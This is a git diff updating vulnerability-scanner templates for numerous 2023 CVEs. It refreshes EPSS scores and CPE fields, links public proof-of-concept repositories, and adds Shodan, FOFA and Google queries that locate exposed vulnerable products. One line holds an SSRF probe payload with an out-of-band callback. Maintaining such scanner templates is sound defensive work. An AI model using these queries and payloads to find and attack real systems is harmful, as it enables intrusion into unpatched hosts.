cpe:2.3:a:phpjabbers:bus_reservation_system:1.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4112.yaml b/http/cves/2023/CVE-2023-4112.yaml index b11311ac6a..e91ffffb5a 100644 --- a/http/cves/2023/CVE-2023-4112.yaml +++ b/http/cves/2023/CVE-2023-4112.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4112 cwe-id: CWE-79 epss-score: 0.00229 - epss-percentile: 0.60385 + epss-percentile: 0.61041 cpe: cpe:2.3:a:phpjabbers:shuttle_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: phpjabbers product: shuttle_booking_software shodan-query: html:"PHP Jabbers.com" + fofa-query: body="php jabbers.com" tags: cve2023,cve,packetstorm,xss,unauth,phpjabbers http: diff --git a/http/cves/2023/CVE-2023-4113.yaml b/http/cves/2023/CVE-2023-4113.yaml index 4259c76310..01a01ffc9b 100644 --- a/http/cves/2023/CVE-2023-4113.yaml +++ b/http/cves/2023/CVE-2023-4113.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4113 cwe-id: CWE-79 - epss-score: 0.00263 - epss-percentile: 0.63974 + epss-score: 0.0027 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:service_booking_script:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4114.yaml b/http/cves/2023/CVE-2023-4114.yaml index 3e9c7c1f58..1ec0ae73d2 100644 --- a/http/cves/2023/CVE-2023-4114.yaml +++ b/http/cves/2023/CVE-2023-4114.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4114 cwe-id: CWE-79 - epss-score: 0.0039 - epss-percentile: 0.70599 + epss-score: 0.00401 + epss-percentile: 0.73538 cpe: cpe:2.3:a:phpjabbers:night_club_booking_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4115.yaml b/http/cves/2023/CVE-2023-4115.yaml index dc51e7ef73..6451e653ef 100644 --- a/http/cves/2023/CVE-2023-4115.yaml +++ b/http/cves/2023/CVE-2023-4115.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4115 cwe-id: CWE-79 epss-score: 0.0027 - epss-percentile: 0.67168 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:cleaning_business_software:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4116.yaml b/http/cves/2023/CVE-2023-4116.yaml index 30a2089b12..babf0a3d96 100644 --- a/http/cves/2023/CVE-2023-4116.yaml +++ b/http/cves/2023/CVE-2023-4116.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-4116 cwe-id: CWE-79 epss-score: 0.0027 - epss-percentile: 0.67168 + epss-percentile: 0.67777 cpe: cpe:2.3:a:phpjabbers:taxi_booking_script:2.0:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: phpjabbers product: taxi_booking_script shodan-query: html:"PHP Jabbers.com" + fofa-query: body="php jabbers.com" tags: cve,cve2023,packetstorm,xss,phpjabbers http: diff --git a/http/cves/2023/CVE-2023-41265.yaml b/http/cves/2023/CVE-2023-41265.yaml index 19d98c6f12..839f8dab6d 100644 --- a/http/cves/2023/CVE-2023-41265.yaml +++ b/http/cves/2023/CVE-2023-41265.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.9 cve-id: CVE-2023-41265 cwe-id: CWE-444 - epss-score: 0.8352 - epss-percentile: 0.9837 + epss-score: 0.91412 + epss-percentile: 0.98873 cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:* metadata: max-request: 1 @@ -26,6 +26,8 @@ info: product: qlik_sense framework: windows shodan-query: html:"Qlik" + fofa-query: app="qlik-sense" + google-query: intitle:"qlik-sense" tags: cve2023,cve,kev,qlik,smuggling,windows http: diff --git a/http/cves/2023/CVE-2023-41266.yaml b/http/cves/2023/CVE-2023-41266.yaml index 5dfc6e1109..90898a1680 100644 --- a/http/cves/2023/CVE-2023-41266.yaml +++ b/http/cves/2023/CVE-2023-41266.yaml @@ -16,8 +16,8 @@ info: cvss-score: 6.5 cve-id: CVE-2023-41266 cwe-id: CWE-20 - epss-score: 0.83414 - epss-percentile: 0.98363 + epss-score: 0.86555 + epss-percentile: 0.98585 cpe: cpe:2.3:a:qlik:qlik_sense:august_2022:-:*:*:enterprise:windows:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: qlik_sense framework: windows shodan-query: http.favicon.hash:-74348711 + fofa-query: app="qlik-sense" + google-query: intitle:"qlik-sense" tags: cve2023,cve,qlik,traversal,kev,windows http: diff --git a/http/cves/2023/CVE-2023-4148.yaml b/http/cves/2023/CVE-2023-4148.yaml index d0825f4029..0ddb1394a8 100644 --- a/http/cves/2023/CVE-2023-4148.yaml +++ b/http/cves/2023/CVE-2023-4148.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4148 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.26209 + epss-score: 0.00071 + epss-percentile: 0.30433 cpe: cpe:2.3:a:metaphorcreations:ditty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,6 +24,8 @@ info: vendor: metaphorcreations product: ditty framework: wordpress + shodan-query: http.html:/wp-content/plugins/ditty-news-ticker/ + fofa-query: body=/wp-content/plugins/ditty-news-ticker/ publicwww-query: /wp-content/plugins/ditty-news-ticker/ tags: cve2023,cve,ditty-news-ticker,wordpress,wp-plugin,wpscan,wp,authenticated,metaphorcreations diff --git a/http/cves/2023/CVE-2023-41538.yaml b/http/cves/2023/CVE-2023-41538.yaml index 7779956df0..1c0bbed02a 100644 --- a/http/cves/2023/CVE-2023-41538.yaml +++ b/http/cves/2023/CVE-2023-41538.yaml @@ -9,13 +9,16 @@ info: reference: - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/PHP-Forum-Script-3.0 - https://nvd.nist.gov/vuln/detail/CVE-2023-41538 + - https://github.com/2lambda123/Windows10Exploits + - https://github.com/codeb0ss/CVE-2023-41538-PoC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-41538 cwe-id: CWE-79 - epss-score: 0.00109 - epss-percentile: 0.4345 + epss-score: 0.00106 + epss-percentile: 0.43265 cpe: cpe:2.3:a:phpjabbers:php_forum_script:3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-41642.yaml b/http/cves/2023/CVE-2023-41642.yaml index 2fc3ac93a3..bfab310376 100644 --- a/http/cves/2023/CVE-2023-41642.yaml +++ b/http/cves/2023/CVE-2023-41642.yaml @@ -15,8 +15,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-41642 cwe-id: CWE-79 - epss-score: 0.00062 - epss-percentile: 0.24611 + epss-score: 0.00069 + epss-percentile: 0.29886 cpe: cpe:2.3:a:grupposcai:realgimm:1.1.37:p38:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-4168.yaml b/http/cves/2023/CVE-2023-4168.yaml index fc4b94187b..35ee14c414 100644 --- a/http/cves/2023/CVE-2023-4168.yaml +++ b/http/cves/2023/CVE-2023-4168.yaml @@ -17,8 +17,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-4168 cwe-id: CWE-200,NVD-CWE-noinfo - epss-score: 0.12454 - epss-percentile: 0.95296 + epss-score: 0.09433 + epss-percentile: 0.94715 cpe: cpe:2.3:a:templatecookie:adlisting:2.14.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-4169.yaml b/http/cves/2023/CVE-2023-4169.yaml index ee8a50c97c..84fe4bb11e 100644 --- a/http/cves/2023/CVE-2023-4169.yaml +++ b/http/cves/2023/CVE-2023-4169.yaml @@ -17,13 +17,14 @@ info: cvss-score: 8.8 cve-id: CVE-2023-4169 cwe-id: CWE-284,NVD-CWE-noinfo - epss-score: 0.00938 - epss-percentile: 0.82702 + epss-score: 0.0131 + epss-percentile: 0.85907 cpe: cpe:2.3:o:ruijie:rg-ew1200g_firmware:1.0\(1\)b1p5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijie product: rg-ew1200g_firmware + shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve,cve2023,ruijie,router,intrusive variables: diff --git a/http/cves/2023/CVE-2023-4173.yaml b/http/cves/2023/CVE-2023-4173.yaml index 75913b4766..2221179ef9 100644 --- a/http/cves/2023/CVE-2023-4173.yaml +++ b/http/cves/2023/CVE-2023-4173.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4173 cwe-id: CWE-79 - epss-score: 0.00226 - epss-percentile: 0.60816 + epss-score: 0.00189 + epss-percentile: 0.56249 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moostore + shodan-query: http.favicon.hash:"702863115" fofa-query: mooSocial tags: cve2023,cve,packetstorm,moosocial,xss diff --git a/http/cves/2023/CVE-2023-4174.yaml b/http/cves/2023/CVE-2023-4174.yaml index 23a28e5c27..5a7b1fe0c4 100644 --- a/http/cves/2023/CVE-2023-4174.yaml +++ b/http/cves/2023/CVE-2023-4174.yaml @@ -21,14 +21,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4174 cwe-id: CWE-79 - epss-score: 0.00352 - epss-percentile: 0.71356 + epss-score: 0.00302 + epss-percentile: 0.69562 cpe: cpe:2.3:a:moosocial:moostore:3.1.6:*:*:*:*:*:*:* metadata: verified: true max-request: 5 vendor: moosocial product: moostore + shodan-query: http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" tags: cve,cve2023,packetstorm,moosocial,xss diff --git a/http/cves/2023/CVE-2023-41763.yaml b/http/cves/2023/CVE-2023-41763.yaml index d4de9d38ba..5574d98b8e 100644 --- a/http/cves/2023/CVE-2023-41763.yaml +++ b/http/cves/2023/CVE-2023-41763.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-41763 - epss-score: 0.05631 - epss-percentile: 0.93128 + epss-score: 0.04783 + epss-percentile: 0.92691 cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:* metadata: verified: true @@ -25,6 +25,7 @@ info: vendor: microsoft product: skype_for_business_server shodan-query: html:"Skype for Business" + fofa-query: body="skype for business" tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" diff --git a/http/cves/2023/CVE-2023-41892.yaml b/http/cves/2023/CVE-2023-41892.yaml index 188fc5cdc2..6d4426101b 100644 --- a/http/cves/2023/CVE-2023-41892.yaml +++ b/http/cves/2023/CVE-2023-41892.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-41892 cwe-id: CWE-94 - epss-score: 0.87963 - epss-percentile: 0.98425 + epss-score: 0.8421 + epss-percentile: 0.98494 cpe: cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: vendor: craftcms product: craft_cms shodan-query: http.favicon.hash:-47932290 + fofa-query: icon_hash=-47932290 publicwww-query: "craftcms" tags: cve2023,cve,rce,unauth,craftcms diff --git a/http/cves/2023/CVE-2023-42442.yaml b/http/cves/2023/CVE-2023-42442.yaml index 48301c8e50..196442230c 100644 --- a/http/cves/2023/CVE-2023-42442.yaml +++ b/http/cves/2023/CVE-2023-42442.yaml @@ -12,13 +12,15 @@ info: - https://github.com/jumpserver/jumpserver/blob/v3.6.1/apps/terminal/api/session/session.py#L91 - https://nvd.nist.gov/vuln/detail/CVE-2023-42442 - https://github.com/jumpserver/jumpserver/commit/0a58bba59cd275bab8e0ae58bf4b359fbc5eb74a + - https://github.com/Marco-zcl/POC + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-42442 cwe-id: CWE-287 - epss-score: 0.09144 - epss-percentile: 0.94063 + epss-score: 0.79196 + epss-percentile: 0.98277 cpe: cpe:2.3:a:fit2cloud:jumpserver:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-42793.yaml b/http/cves/2023/CVE-2023-42793.yaml index 2a7e94274f..97ed5429c7 100644 --- a/http/cves/2023/CVE-2023-42793.yaml +++ b/http/cves/2023/CVE-2023-42793.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-42793 cwe-id: CWE-288 - epss-score: 0.97093 - epss-percentile: 0.99759 + epss-score: 0.97094 + epss-percentile: 0.99777 cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,7 @@ info: product: teamcity shodan-query: title:TeamCity fofa-query: title=TeamCity + google-query: intitle:teamcity tags: cve2023,cve,jetbrains,teamcity,rce,auth-bypass,intrusive,kev http: diff --git a/http/cves/2023/CVE-2023-43177.yaml b/http/cves/2023/CVE-2023-43177.yaml index 4b7c96efa1..9002704bfb 100644 --- a/http/cves/2023/CVE-2023-43177.yaml +++ b/http/cves/2023/CVE-2023-43177.yaml @@ -17,13 +17,15 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43177 cwe-id: CWE-913 - epss-score: 0.92767 - epss-percentile: 0.98966 + epss-score: 0.96402 + epss-percentile: 0.99567 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: crushftp product: crushftp + shodan-query: http.html:"crushftp" + fofa-query: body="crushftp" tags: cve,cve2023,crushftp,unauth,rce,intrusive flow: http(1) && http(2) && http(3) diff --git a/http/cves/2023/CVE-2023-43187.yaml b/http/cves/2023/CVE-2023-43187.yaml index b8a0294b5d..9af87f47a0 100644 --- a/http/cves/2023/CVE-2023-43187.yaml +++ b/http/cves/2023/CVE-2023-43187.yaml @@ -14,13 +14,14 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43187 cwe-id: CWE-91 - epss-score: 0.09598 - epss-percentile: 0.94633 + epss-score: 0.2535 + epss-percentile: 0.96685 cpe: cpe:2.3:a:nodebb:nodebb:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: nodebb product: nodebb + shodan-query: cpe:"cpe:2.3:a:nodebb:nodebb" fofa-query: "title=\"nodebb\"" tags: cve,cve2023,nodebb,rce flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-43208.yaml b/http/cves/2023/CVE-2023-43208.yaml index b840e7cc68..98b9918453 100644 --- a/http/cves/2023/CVE-2023-43208.yaml +++ b/http/cves/2023/CVE-2023-43208.yaml @@ -16,14 +16,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-43208 - epss-score: 0.00349 - epss-percentile: 0.71422 + epss-score: 0.96306 + epss-percentile: 0.99539 cpe: cpe:2.3:a:nextgen:mirth_connect:*:*:*:*:*:*:*:* metadata: vendor: nextgen product: mirth_connect shodan-query: title:"mirth connect administrator" - tags: cve,cve2023,nextgen,rce + fofa-query: title="mirth connect administrator" + google-query: intitle:"mirth connect administrator" + tags: packetstorm,cve,cve2023,nextgen,rce,kev http: - raw: diff --git a/http/cves/2023/CVE-2023-43261.yaml b/http/cves/2023/CVE-2023-43261.yaml index 860d4d386e..d3499af1d8 100644 --- a/http/cves/2023/CVE-2023-43261.yaml +++ b/http/cves/2023/CVE-2023-43261.yaml @@ -17,14 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2023-43261 cwe-id: CWE-532 - epss-score: 0.00476 - epss-percentile: 0.73134 - cpe: cpe:2.3:o:milesight:ur5x_firmware:*:*:*:*:*:*:*:* + epss-score: 0.00565 + epss-percentile: 0.77715 + cpe: cpe:2.3:h:milesight:ur51:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: milesight - product: ur5x_firmware + product: ur51 shodan-query: http.html:rt_title tags: cve2023,cve,router,milesight,disclosure,unauth,iot diff --git a/http/cves/2023/CVE-2023-43325.yaml b/http/cves/2023/CVE-2023-43325.yaml index 8cffbf64dc..732dc80970 100644 --- a/http/cves/2023/CVE-2023-43325.yaml +++ b/http/cves/2023/CVE-2023-43325.yaml @@ -17,14 +17,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-43325 cwe-id: CWE-79 - epss-score: 0.37241 - epss-percentile: 0.97089 + epss-score: 0.18316 + epss-percentile: 0.96187 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: diff --git a/http/cves/2023/CVE-2023-43326.yaml b/http/cves/2023/CVE-2023-43326.yaml index ee7185587d..6f785e9c29 100644 --- a/http/cves/2023/CVE-2023-43326.yaml +++ b/http/cves/2023/CVE-2023-43326.yaml @@ -16,14 +16,16 @@ info: cvss-score: 6.1 cve-id: CVE-2023-43326 cwe-id: CWE-79 - epss-score: 0.00643 - epss-percentile: 0.78809 + epss-score: 0.00666 + epss-percentile: 0.79657 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 1b20ba9e04..49692b3e4c 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43374 cwe-id: CWE-89 - epss-score: 0.00076 - epss-percentile: 0.31944 + epss-score: 0.00735 + epss-percentile: 0.80777 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 @@ -27,8 +27,8 @@ info: product: hoteldruid shodan-query: title:"HotelDruid" fofa-query: title="HotelDruid" + google-query: intitle:"hoteldruid" tags: cve,cve2023,hoteldruid,cms,sqli - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-43795.yaml b/http/cves/2023/CVE-2023-43795.yaml index 08e6822031..18838f4b30 100644 --- a/http/cves/2023/CVE-2023-43795.yaml +++ b/http/cves/2023/CVE-2023-43795.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-43795 cwe-id: CWE-918 - epss-score: 0.11649 - epss-percentile: 0.95151 + epss-score: 0.13101 + epss-percentile: 0.9552 cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: product: geoserver shodan-query: title:"GeoServer" fofa-query: app="GeoServer" + google-query: intitle:"geoserver" tags: cve2023,cve,geoserver,ssrf,oast,oos,osgeo variables: oast: "{{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-4415.yaml b/http/cves/2023/CVE-2023-4415.yaml index 46398ab734..9cff578c2a 100644 --- a/http/cves/2023/CVE-2023-4415.yaml +++ b/http/cves/2023/CVE-2023-4415.yaml @@ -11,18 +11,20 @@ info: - https://github.com/blakespire/repoforcve/tree/main/RG-EW1200G-logic - https://vuldb.com/?ctiid.237518 - https://vuldb.com/?id.237518 + - https://github.com/thedarknessdied/Ruijie_RG-EW1200G_login_bypass-CVE-2023-4415 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2023-4415 cwe-id: CWE-287 - epss-score: 0.00355 - epss-percentile: 0.69044 + epss-score: 0.00593 + epss-percentile: 0.78272 cpe: cpe:2.3:o:ruijienetworks:rg-ew1200g_firmware:07161417_r483:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ruijienetworks product: rg-ew1200g_firmware + shodan-query: http.html:"app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" fofa-query: body="app.2fe6356cdd1ddd0eb8d6317d1a48d379.css" tags: cve2023,cve,ruijie,router,ruijienetworks diff --git a/http/cves/2023/CVE-2023-44352.yaml b/http/cves/2023/CVE-2023-44352.yaml index efacc220cb..612d04fdf4 100644 --- a/http/cves/2023/CVE-2023-44352.yaml +++ b/http/cves/2023/CVE-2023-44352.yaml @@ -23,6 +23,8 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe Coldfusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2023,coldfusion,adobe,xss variables: string: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-44353.yaml b/http/cves/2023/CVE-2023-44353.yaml index 5a92691943..b74ce8c896 100644 --- a/http/cves/2023/CVE-2023-44353.yaml +++ b/http/cves/2023/CVE-2023-44353.yaml @@ -12,13 +12,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2023-44353 - https://helpx.adobe.com/security/products/coldfusion/apsb23-52.html - https://research.nccgroup.com/2023/11/21/technical-advisory-adobe-coldfusion-wddx-deserialization-gadgets/#coldfusion-wddx.py + - https://github.com/JC175/CVE-2023-44353-Nuclei-Template + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-44353 cwe-id: CWE-502 - epss-score: 0.00456 - epss-percentile: 0.72579 + epss-score: 0.00412 + epss-percentile: 0.73869 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,8 +28,9 @@ info: vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve2023,cve,adobe,coldfusion,deserialization,xss - variables: windows_known_path: "C:\\Windows\\" windows_bad_path: "C:\\Thisdefinitelydoesnotexist\\" diff --git a/http/cves/2023/CVE-2023-4451.yaml b/http/cves/2023/CVE-2023-4451.yaml index 5250b902bf..48b2ffe41f 100644 --- a/http/cves/2023/CVE-2023-4451.yaml +++ b/http/cves/2023/CVE-2023-4451.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4451 cwe-id: CWE-79 - epss-score: 0.00064 - epss-percentile: 0.2616 + epss-score: 0.00157 + epss-percentile: 0.52015 cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,7 @@ info: vendor: agentejo product: cockpit shodan-query: html:"Cockpit" + fofa-query: icon_hash=688609340 tags: cve2023,cve,huntr,cockpit,xss,agentejo http: diff --git a/http/cves/2023/CVE-2023-44812.yaml b/http/cves/2023/CVE-2023-44812.yaml index 6f93166dc3..3bce26624b 100644 --- a/http/cves/2023/CVE-2023-44812.yaml +++ b/http/cves/2023/CVE-2023-44812.yaml @@ -19,15 +19,15 @@ info: cvss-score: 6.1 cve-id: CVE-2023-44812 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28937 + epss-score: 0.01077 + epss-percentile: 0.84242 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" fofa-query: icon_hash="702863115" tags: cve2023,cve,moosocial,xss - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-44813.yaml b/http/cves/2023/CVE-2023-44813.yaml index e8a8a086ed..501673e2a6 100644 --- a/http/cves/2023/CVE-2023-44813.yaml +++ b/http/cves/2023/CVE-2023-44813.yaml @@ -13,13 +13,14 @@ info: reference: - https://github.com/ahrixia/CVE-2023-44813 - https://nvd.nist.gov/vuln/detail/CVE-2023-44813 + - https://github.com/nomi-sec/PoC-in-GitHub classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-44813 cwe-id: CWE-79 - epss-score: 0.00069 - epss-percentile: 0.28937 + epss-score: 0.01077 + epss-percentile: 0.84242 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +28,7 @@ info: vendor: moosocial product: moosocial shodan-query: http.favicon.hash:702863115 + fofa-query: icon_hash="702863115" tags: cve,cve2023,moosocial,xss http: diff --git a/http/cves/2023/CVE-2023-4521.yaml b/http/cves/2023/CVE-2023-4521.yaml index fbbaafe62a..bf24c77f4b 100644 --- a/http/cves/2023/CVE-2023-4521.yaml +++ b/http/cves/2023/CVE-2023-4521.yaml @@ -15,16 +15,16 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4521 - epss-score: 0.00156 - epss-percentile: 0.51418 + epss-score: 0.03055 + epss-percentile: 0.90979 cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:wordpress:*:* metadata: vendor: mooveagency product: import_xml_and_rss_feeds framework: wordpress + shodan-query: http.html:"import-xml-feed" fofa-query: body="import-xml-feed" tags: cve,cve2023,wordpress,wp,wpscan,unauth,rce - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-45375.yaml b/http/cves/2023/CVE-2023-45375.yaml index 49fad0f912..cecb719429 100644 --- a/http/cves/2023/CVE-2023-45375.yaml +++ b/http/cves/2023/CVE-2023-45375.yaml @@ -13,18 +13,17 @@ info: cvss-score: 8.8 cve-id: CVE-2023-45375 cwe-id: CWE-89 - epss-score: 0.0005 - epss-percentile: 0.17639 + epss-score: 0.01204 + epss-percentile: 0.8517 cpe: cpe:2.3:a:01generator:pireospay:*:*:*:*:*:prestashop:*:* metadata: - max-request: 1 verified: true + max-request: 1 vendor: 01generator product: pireospay framework: prestashop shodan-query: http.component:"prestashop" tags: cve,cve2023,sqli,prestashop,pireospay - flow: http(1) && http(2) http: diff --git a/http/cves/2023/CVE-2023-4542.yaml b/http/cves/2023/CVE-2023-4542.yaml index 3d03d31d2d..7dc533eff5 100644 --- a/http/cves/2023/CVE-2023-4542.yaml +++ b/http/cves/2023/CVE-2023-4542.yaml @@ -10,20 +10,22 @@ info: - https://github.com/20142995/sectool - https://github.com/tanjiti/sec_profile - https://github.com/wy876/POC/blob/main/D-Link_DAR-8000%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E(CVE-2023-4542).md + - https://vuldb.com/?ctiid.238047 + - https://vuldb.com/?id.238047 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-4542 cwe-id: CWE-78 - epss-score: 0.00067 - epss-percentile: 0.29155 + epss-score: 0.90977 + epss-percentile: 0.9884 cpe: cpe:2.3:o:dlink:dar-8000-10_firmware:*:*:*:*:*:*:*:* metadata: + verified: true + max-request: 1 vendor: dlink product: dar-8000-10_firmware fofa-query: body="DAR-8000-10" && title="D-Link" - verified: true - max-request: 1 tags: cve,cve2023,dlink http: diff --git a/http/cves/2023/CVE-2023-4547.yaml b/http/cves/2023/CVE-2023-4547.yaml index 1c04c62437..8b9371da82 100644 --- a/http/cves/2023/CVE-2023-4547.yaml +++ b/http/cves/2023/CVE-2023-4547.yaml @@ -17,8 +17,8 @@ info: cvss-score: 6.1 cve-id: CVE-2023-4547 cwe-id: CWE-79 - epss-score: 0.00205 - epss-percentile: 0.58464 + epss-score: 0.0025 + epss-percentile: 0.6492 cpe: cpe:2.3:a:spa-cart:ecommerce_cms:1.9.0.3:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-45542.yaml b/http/cves/2023/CVE-2023-45542.yaml index de835a8516..279a767856 100644 --- a/http/cves/2023/CVE-2023-45542.yaml +++ b/http/cves/2023/CVE-2023-45542.yaml @@ -16,13 +16,15 @@ info: cve-id: CVE-2023-45542 cwe-id: CWE-79 epss-score: 0.00082 - epss-percentile: 0.33567 + epss-percentile: 0.34845 cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: moosocial product: moosocial + shodan-query: http.favicon.hash:"702863115" + fofa-query: icon_hash="702863115" tags: cve2023,cve,xss,moosocial http: diff --git a/http/cves/2023/CVE-2023-45671.yaml b/http/cves/2023/CVE-2023-45671.yaml index c5b8633606..4c5ca209a2 100644 --- a/http/cves/2023/CVE-2023-45671.yaml +++ b/http/cves/2023/CVE-2023-45671.yaml @@ -10,17 +10,23 @@ info: reference: - https://github.com/blakeblackshear/frigate/security/advisories/GHSA-jjxc-m35j-p56f - https://nvd.nist.gov/vuln/detail/CVE-2023-45671 + - https://securitylab.github.com/advisories/GHSL-2023-190_Frigate/ 